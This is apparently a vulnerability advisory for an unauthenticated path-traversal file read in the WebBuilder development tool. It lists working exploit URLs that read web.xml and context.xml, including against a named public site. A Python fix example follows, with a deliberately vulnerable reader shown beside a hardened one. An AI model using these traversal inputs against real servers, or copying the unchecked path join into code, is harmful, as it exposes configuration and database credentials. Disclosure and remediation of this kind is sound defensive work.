Open-source Web Application Development Tool WebBuilder: Arbitrary File Read and Fix
The open-source web application development tool WebBuilder has an arbitrary file read vulnerability that can leak sensitive information such as the server and database configuration.
A method in the code reads files from a user-controlled path:
Looking in the database, the xwl that calls this method does not require login verification, so it can be accessed without any permission:
Therefore, access this URL:
The code reads files from the webbuilder/docs/ directory. First, access a file in that folder:
http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@index.txt
The dir parameter is not filtered for ../, so it can be modified to point elsewhere. For example, submit the path of web.xml:
http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../WEB-INF/web.xml
Try again with context.xml:
http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../META-INF/context.xml
Tested on WebBuilder's official online site:
http://www.putdb.com/main?xwl=13O1AVUENBSF&dir=@../WEB-INF/web.xml
http://www.putdb.com/main?xwl=13O1AVUENBSF&dir=@../META-INF/context.xml
Solution:
1. Filter ../ from the dir parameter.
2. Check that the resolved path is still inside the docs directory before reading the file.
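The following is an added example, not WebBuilder's own code, showing the second fix from the solution list: canonicalise the requested path and verify it stays under the docs directory. It assumes the leading "@" in the advisory's URLs marks a docs-relative path (the real WebBuilder convention is not documented on this page), and it builds a constructed webbuilder/docs/ layout in a temporary directory so it runs offline. The unchecked reader is kept beside the hardened one so the difference is visible on the same inputs.

```python
import os
import tempfile
from pathlib import Path


class PathTraversalError(ValueError):
    """Raised when a requested path would escape the docs directory."""


def _strip_marker(dir_param):
    # Assumption: the leading '@' in the advisory's URLs marks a
    # docs-relative path; WebBuilder's actual convention is not on the page.
    return dir_param[1:] if dir_param.startswith("@") else dir_param


def vulnerable_read(docs_root, dir_param):
    """Unchecked join, as the advisory describes: '../' walks out of docs_root."""
    rel = _strip_marker(dir_param)
    with open(os.path.join(str(docs_root), rel), encoding="utf-8") as fh:
        return fh.read()


def resolve_docs_path(docs_root, dir_param):
    """Map dir_param to a file under docs_root, or raise PathTraversalError."""
    root = Path(docs_root).resolve()
    rel = _strip_marker(dir_param)
    # Reject absolute paths outright; resolve() would otherwise honour them.
    if os.path.isabs(rel) or rel.startswith(("/", "\\")):
        raise PathTraversalError(dir_param)
    # Canonicalise (collapses '..', follows symlinks), then check containment
    # against the canonical root rather than scanning the string for '../'.
    candidate = (root / rel).resolve()
    if candidate != root and root not in candidate.parents:
        raise PathTraversalError(dir_param)
    if not candidate.is_file():
        raise FileNotFoundError(dir_param)
    return candidate


def safe_read(docs_root, dir_param):
    """Hardened reader: only files inside docs_root can be returned."""
    return resolve_docs_path(docs_root, dir_param).read_text(encoding="utf-8")


def demo():
    """Build a constructed webbuilder/ layout and exercise both readers."""
    with tempfile.TemporaryDirectory() as tmp:
        app = Path(tmp) / "webbuilder"
        (app / "docs").mkdir(parents=True)
        (app / "WEB-INF").mkdir()
        (app / "docs" / "index.txt").write_text("docs index", encoding="utf-8")
        (app / "WEB-INF" / "web.xml").write_text("<web-app/>", encoding="utf-8")
        docs = app / "docs"
        results = {
            "vuln_index": vulnerable_read(docs, "@index.txt"),
            "vuln_webxml": vulnerable_read(docs, "@../WEB-INF/web.xml"),
            "safe_index": safe_read(docs, "@index.txt"),
        }
        for bad in ("@../WEB-INF/web.xml", "@sub/../../WEB-INF/web.xml", "/etc/passwd"):
            try:
                safe_read(docs, bad)
                results[bad] = "READ"
            except PathTraversalError:
                results[bad] = "blocked"
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The containment check is done on the canonical path rather than by removing the literal string `../` (the advisory's first fix), because canonicalisation also covers nested `dir/../..` sequences and symlinks, and it gives one decision point that can be logged when a request is rejected.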